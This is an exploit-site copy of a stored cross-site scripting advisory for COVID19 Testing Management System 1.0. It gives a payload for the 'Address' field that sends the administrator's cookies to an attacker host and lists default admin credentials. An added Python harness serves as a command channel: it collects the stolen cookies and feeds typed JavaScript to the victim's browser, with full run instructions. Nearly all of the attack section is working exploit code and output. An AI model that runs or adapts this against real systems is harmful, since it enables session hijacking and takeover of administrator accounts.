COVID19 Testing Management System 1.0 - Remote Code Execution (RCE) through Stored Cross-Site-Scripting (XSS)

CVE: N/A
Category: CWE-79
Price: Varies
Severity: Critical
Author: ExploitAlert Team
Risk: High
Exploitation Type: Remote
Date: 2021-06-14
CVSS: CVSS:4.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS: 0.02192
EPSSP (percentile): 0.50148

Note: the vector string is labelled CVSS:4.0 but uses CVSS v3.x metric names (S, C, I, A), and AV:L / UI:N do not match the attack described below, which is delivered remotely over the network and requires the administrator to view the stored record.


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060084

Below is a copy:

# Exploit Title: COVID19 Testing Management System 1.0 - Remote Code Execution (RCE) through Stored Cross-Site-Scripting (XSS)
# Date: 11 June 2021
# Exploit Author: BHAVESH KAUL
# Author Linkedin: https://www.linkedin.com/in/bhavesh-kaul-cs/
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Server: XAMPP

# Description #

COVID19 Testing Management System 1.0 stores the user-supplied 'Address' field without sanitization and renders it unescaped in the administration panel, so an attacker can plant a stored XSS payload without authenticating: the public new-user registration form accepts the payload, the application writes it to the database, and it fires when the administrator views the new user's details. The payload loads a remote JavaScript stage that gives the attacker a command channel into the administrator's browser (the "reverse shell" of the title), allowing session-cookie theft and any action the administrator can perform in the application. What the PoC demonstrates is JavaScript execution in the victim's browser session, not code execution on the server hosting the application.

# Proof of Concept (PoC) : Exploit #

1) Go to: http://localhost/covid-tms/new-user-testing.php

2) Enter the following payload in 'Address' parameter: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//OUR_IP:OUR_PORT/?"+document.cookie},1010)</script>

3) Fill out the other fields and submit the form

4) Now login as administrator: Test Credentials = admin | Test@123

5) Go to: http://localhost/covid-tms/new-test.php

6) Click on 'View Details' for your recently added entry

7) Our XSS payload fires and we get a reverse shell session in our terminal:

[~] Waiting for the payload to be executed
listening on [any] 33 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.15] 49872

GET / HTTP/1.1
Host: Redacted-IP:Redacted-Port
User-Agent: -redacted-
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
DNT: 1
Connection: keep-alive

[+] Victim is online. Enter JS code to execute.

8) From this session we execute JavaScript in the administrator's browser: read document.cookie (the authenticated session cookie), rewrite every link on the page, or manipulate application data with the administrator's privileges without ever knowing the administrator's credentials.
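The eight steps above, automated on the attacker side as an added example; this is not the advisory author's tool (only its listener output appears in step 7) and not code from the application. build_payload() reproduces the advisory's payload with OUR_IP/OUR_PORT filled in; Collector is a stage-2 HTTP server standing in for the netcat listener that logs the leaked document.cookie on every poll and answers each poll with whatever JavaScript you type, which the administrator's browser then executes; render_admin_cell() shows, hypothetically (the application's PHP is not on the page), the unescaped rendering that makes the payload live beside the output-encoded rendering that keeps it inert. Host and port are command-line arguments; no form field other than 'Address' is assumed.

```python
"""Attacker-side harness for the stored XSS in the 'Address' field.

Added example, not the advisory author's tool. Assumptions (hypothetical):
  * attacker host/port are passed on the command line
  * render_admin_cell() stands in for the admin page's HTML, which is not
    shown on the page; it only illustrates unescaped vs escaped output
"""
import html
import queue
import sys
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote


def build_payload(host: str, port: int, interval_ms: int = 1010) -> str:
    """The advisory's payload with OUR_IP / OUR_PORT filled in.

    Every `interval_ms` the victim's browser appends a <script> whose src
    points at us: the query string leaks document.cookie, and the response
    body is executed as JavaScript in the administrator's session.
    """
    return (
        '<script>setInterval(function(){with(document)body.appendChild('
        f'createElement("script")).src="//{host}:{port}/?"+document.cookie'
        f'}},{interval_ms})</script>'
    )


def parse_exfil(path: str) -> dict[str, str]:
    """Turn a request path like '/?PHPSESSID=abc;%20theme=dark' into a cookie jar.

    The payload concatenates document.cookie raw; the browser percent-encodes
    the spaces, so decode first and then split on the cookie separator.
    Paths that are not exfil (e.g. /favicon.ico) yield an empty dict.
    """
    if not path.startswith("/?"):
        return {}
    jar: dict[str, str] = {}
    for part in unquote(path[2:]).split(";"):
        part = part.strip()
        if "=" not in part:
            continue
        name, _, value = part.partition("=")
        jar[name.strip()] = value
    return jar


class Collector(BaseHTTPRequestHandler):
    """Stage-2 server: records the leaked cookies, serves the next JS command."""

    commands: "queue.Queue[str]" = queue.Queue()   # JS lines typed by the operator
    seen: list[dict[str, str]] = []                # every cookie jar received

    def do_GET(self) -> None:
        jar = parse_exfil(self.path)
        if jar:
            Collector.seen.append(jar)
            print(f"[+] Victim is online. Cookies: {jar}")
        try:
            js = Collector.commands.get_nowait()
        except queue.Empty:
            js = ""  # nothing queued: serve an empty script, browser keeps polling
        body = js.encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/javascript")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args) -> None:  # silence the default access log
        pass


def render_admin_cell(address: str, escape: bool) -> str:
    """Hypothetical rendering of the Address column on the 'View Details' page.

    escape=False mirrors the vulnerable behaviour: the stored payload becomes
    live markup. escape=True is the fix: HTML-encode on output so the same
    bytes are shown as text and never parsed as a <script> element.
    """
    shown = html.escape(address, quote=True) if escape else address
    return f"<td>{shown}</td>"


def main() -> None:
    host, port = sys.argv[1], int(sys.argv[2])
    print("[~] Paste into 'Address':", build_payload(host, port))
    server = HTTPServer(("0.0.0.0", port), Collector)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    print("[~] Waiting for the payload to be executed. Type JS and press Enter.")
    for line in sys.stdin:                  # each line becomes the next stage
        Collector.commands.put(line.rstrip("\n"))


if __name__ == "__main__":
    main()
```

Run it as `python3 collector.py 10.0.2.15 33`, submit the printed payload in the Address field, then log in as the administrator and open 'View Details': the browser calls back every 1010 ms for as long as that page stays open, each callback carrying the admin's cookies and executing the line you typed most recently.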


# Reference Image #

1) Vulnerable Parameter: https://ibb.co/s5t0Xhr
2) XSS Payload Fired & Reverse Shell Established: https://ibb.co/NyW3j3F
3) Reverse-Shell Payload Fired: https://ibb.co/P1R9ShW

Copyright ©2024 Exploitalert.
